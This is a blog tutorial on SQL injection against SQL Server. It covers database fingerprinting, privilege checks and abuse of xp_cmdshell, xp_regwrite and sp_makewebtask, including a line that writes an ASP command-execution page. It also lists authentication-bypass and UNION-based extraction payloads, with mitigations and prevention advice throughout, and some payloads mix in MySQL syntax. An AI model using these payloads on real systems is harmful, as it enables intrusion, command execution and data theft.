Fading Coder

One Final Commit for the Last Sprint

Home > Tech > Content

Exploiting SQL Server Extended Stored Procedures for Injection Attacks

Tech 2

Detecting SQL Server Database Type

To determine if the database is SQL Server, check for the existance of the sysobjects system table, which contains metadata about all database objects.

AND EXISTS (SELECT * FROM sysobjects)

If this query returns true, it indicates a SQL Server database.

Verifying Database Account Permissions

Use the IS_SRVROLEMEMBER function to check server role membership:

AND 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))  -- System administrator
AND 1=(SELECT IS_SRVROLEMEMBER('db_owner'))  -- Database owner
AND 1=(SELECT IS_SRVROLEMEMBER('public'))    -- Public role
  • sysadmin: Highest server-level privileges
  • db_owner: Full control over specific database
  • public: Basic permissions granted to all users

Extended Stored Procedure Exploitation

SQL Server provides extended stored procedures that can execute system-level operations when sufficient permissions are available.

xp_cmdshell

Executes operating system comands from SQL Server context:

EXEC master.dbo.xp_cmdshell 'dir C:\'

Mitigation:

  • Keep xp_cmdshell disabled by default
  • Restrict access to trusted administrators only

xp_regwrite

Writes values to Windows Registry:

EXEC xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Test', 'ValueName', 'REG_SZ', 'MaliciousData'

Mitigation:

  • Limit registry write permissions
  • Monitor registry changes

sp_makewebtask (Deprecated)

Generates web pages from query results:

EXEC sp_makewebtask @outputfile='C:\web\malicious.asp', @query='SELECT ''<%Execute("cmd")%>'''

Mitigation:

  • Remove or disable this deprecated procedure
  • Restrict file system write permissions

Database Owner Privilege Exploitation

Even with only db_owner permissions, attackers may attempt privilege escalation:

EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services', 'ServiceName'

Mitigation:

  • Apply principle of least privilege
  • Implement auditing and monitoring

SQL Injecsion Techniques for Database Enumeration

Using GROUP BY and HAVING Clauses

SELECT col FROM tbl GROUP BY col HAVING col='guessed_name'

Mitigation:

  • Use parameterized queries
  • Validate and sanitize user input

ORDER BY with Type Conversion Erors

SELECT * FROM users ORDER BY guessed_column

Mitigation:

  • Implement input validation
  • Avoid detailed error messages

INFORMATION_SCHEMA Queries

SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='target_db'

Mitigation:

  • Restrict INFORMATION_SCHEMA access
  • Apply minimal necessary permissions

UNION SELECT Injection

SELECT id FROM products WHERE category='input' UNION SELECT username FROM users

Mitigation:

  • Use parameterized statements
  • Validate input thoroughly

Password Hash Extraction

SELECT pwd_hash FROM accounts WHERE username='admin'

Mitigation:

  • Store password hashes with strong algorithms (bcrypt)
  • Add appropriate salts
  • Never store plaintext passwords

Classic SQL Injection Payloads

Universal Authentication Bypass

' OR '1'='1

When injected into authentication logic:

SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'

The condition '1'='1' always evaluates to true, bypassing authentication.

Limited Result Injection

a' OR 1=1 LIMIT 0,1--

This returns only the first matching record while bypassing authentication.

Database Information Extraction

1' UNION SELECT 1,CONCAT_WS(CHAR(58),USER(),DB_NAME(),@@VERSION)--

Returns current user, database name, and SQL Server version separated by colons.

Extended System Information

' UNION SELECT 1,CONCAT_WS(':',CURRENT_USER,DATABASE(),@@VERSION,@@SERVERNAME,@@LANGUAGE)--

Gathers comprehensive system information including hostname and language settings.

Schema Enumeration

' UNION SELECT 1,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='target_db'#

Lists all tables in the specified database schema.

Prevention Strategies

  1. Parameterized Queries: Use prepared statements with parameter binding
  2. Input Validation: Implement strict validation and sanitization routines
  3. Least Priviledge: Grant minimal necessary permissions to database accounts
  4. Regular Updates: Apply security patches and updates promptly
  5. Multi-Factor Authentication: Implement additional authentication layers
  6. Error Handling: Use generic error messages without revealing system details
  7. Web Application Firewalls: Deploy WAF solutions to detect and block injection attempts
  8. Code Review: Conduct regular security audits of database interaction code
Tags: SQL Server
Back to List

Prev: Dynamic Programming for the Knapsack Problem

Next: Essential NumPy Operations for Data Analysis

Related Articles

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Django’s Admin panel is highly user-friendly, and pairing it with TinyMCE, an effective rich text editor, simplifies content management significantly. Combining the two is particular useful for bloggi...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top